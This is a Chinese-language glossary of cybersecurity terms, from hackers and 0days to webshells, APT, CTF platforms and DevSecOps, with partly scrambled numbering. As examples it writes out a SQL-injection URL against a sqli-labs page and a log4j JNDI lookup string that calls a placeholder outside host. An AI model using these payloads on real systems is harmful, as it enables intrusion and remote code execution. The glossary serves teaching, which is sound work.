1、黑客(hacker)
对计算机技术非常擅长的人,窃取数据、破坏计算机系统2.白帽子
3. 红帽黑客
- 白帽子的目的是发现企业的漏洞并且上报给企 业,帮助其解决风险问题
- 360补天、漏洞盒子、CNVD、CNNVD
有正义感、爱国的黑客。利用技术维护国家网络 安全,并且对外来的攻击进行反击4.漏洞
http://www.cnnvd.org.cn/web/wz/bzxqById.tag?id=3&mkid=3??????5.POC
漏洞指的是硬件、软件、协议等等存在的安全缺陷
6. exp
- Proof of Concept
- 能证明漏洞存在的代码
7. payload(攻击载荷)
- Exploit
- 执行了这一段利用代码之后,就能够达到攻击的目的
- msf
8. 0day
- SQL注入http://localhost/sqli-labs/Less-3/?id=-1') union select 1,1,database() --+
- XSS
- log4j ${jndi:ldap://xxxxxx.domain.cn/test}
使用量非常大的通用产品漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞9. 1day
漏洞的 POC 和 EXP 已经被公开了,但是很多人还来不及修复,这个叫做 1day 漏洞10. Nday 漏洞
指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。11. 渗透测试
用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据12. 肉鸡
已经被黑客获得控制权限的机器,可能是个人电脑也可能是企业或者政府单位的服务器,通常情况下因为使用者并不知道已经被入侵,所以黑客可以长期获得权限和控制13. 抓鸡
利用出现概率非常高漏洞(比如 log4j 、永恒之蓝),使用自动化方式获取肉鸡的行为14. 跳板机
黑客为了防止被追溯和识别身份,一般都不会用自己的电脑发起攻击,而是利用获取的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色15. DDos
16. 中间人攻击
- Distributed Denial of Service
- 分布式拒绝服务攻击
- 发起大量恶意请求,导致正常用户无法访问
17. 网络钓鱼
- Man-in-the-Middle AttackMITM攻击
- 运行中间服务器,拦截并篡改数据
钓鱼网站指的是冒充的网站,用来窃取用户的账号密码cookie18. webshell
19. Getshell
- shell是一种命令执行工具,可以对计算机进行控制
- webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做 任意的操作
- 小马一句话木马大马
20. 横向移动
- 获得命令执行环境的操作
- Redis的持久化功能、MySQL的写文件功能,MySQL的日志记录功能、上传功能、数据备份功能、编辑器
攻击者入侵一台服务器成功以后,基于内部网络,继续入侵同网段的其他机器21. 代理(Proxy)
帮我们发起网络请求的一台服务器22. VPN(Virtual Private Network)
23. 蜜罐(Honeypot)
- 代理
- 加密通信
- 办公在家里连接到公司内网
吸引攻击者攻击的伪装系统,用来实现溯源和反制24. 沙箱(Sandbox)
沙箱是一种按照安全策略限制程序行为的执行环境,就算有恶意代码,也只能影响沙箱环境而不会影响到操作系统25. 堡垒机
26. APT
- 跳板机jumpserver
- 运维审计系统管理资源,审批、审计、访问控制、事件记录
Advanced Persistent Threat27. 护网(HVV)
- APT攻击
- 高级可持续威胁攻击,指某组织在网络上对特定对象展开的持续有效的攻击活动
- 报告:2021深信服APT攻防趋势半年洞察
国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习28. CTF
29. CVE
- bugkuhttps://ctf.bugku.com/challenges/index. html
- 北京联合大学https://buuoj.cn/challenges
- CTFHubhttps://www.ctfhub.com/
- bmzCTFhttp://bmzclub.cn/challenges
- 攻防世界https://adworld.xctf.org.cn
- CTFSHOWhttps://ctf.show/challenges
30. CNVD
- Common Vulnerabilities and Exposures通用漏洞披露
- Mitre例如:CVE-2021-44228
- https://www.cve.org/
31. SRC
- 国家信息安全漏洞共享平台https://www.cnvd.org.cn/
- 国家计算机应急响应中心 CNCERT维护https://www.cert.org.cn/publish/main/index.html
32. ATT&CK
- Security Response Center企业的应急响应中心
- http://0xsafe.org/
- https://www.vulbox.com/
- https://src.sjtu.edu.cn/
33. DevOps(攻击者技战术的知识库)
- Adversarial Tactics, Techniques, and Common Knowledge
- 对抗战术、技术和通用知识
- Mitre
- 风险分析模型
- 收集威胁情报,模拟APT攻击
34. CICD
- Development +Operations
- 开发测试运维一体化
35. DevSecOps具体技术Git 代码管理、 Jenkins 版本管理、代码扫描、自动化测试
- 持续集成(Continuous Integration)
- 持续交付(Continuous Delivery)
- 持续部署(Continuous Deployment)
Development + Security + Operations安全开发与运维36. 等保
37. 网络空间测绘
- 网络安全等级保护
- 要求相关行业的单位和公司的信息系统必须进行定级,然后在公安机关备案。然后建设整改,然后由测评机构评级,并且持续维护和监督
- 网络空间资源收录
- 网络空间搜索引擎
- www.shodan.io
- fofa.so
- www.zoomeye.org
【信息安全|网络安全常用术语】
推荐阅读
- 网络基本概念|网络安全(加密技术、数字签名、证书)
- 网络|ARP防御篇-如何揪出“内鬼”并“优雅的还手”
- 安全|Apache Commons Configuration远程代码执行漏洞(CVE-2022-33980)分析&复现
- web安全|网络安全之文件包含漏洞总结
- 物联网|bp神经网络是什么网络,bp神经网络和神经网络
- 安全|【期末复习】网络空间安全导论
- 网络攻击与防御实训|6.1 Burp Suite漏洞扫描使用
- 渗透蓝队|蓝队学习笔记之应急响应案例
- 渗透蓝队|蓝队应急响应之Windows篇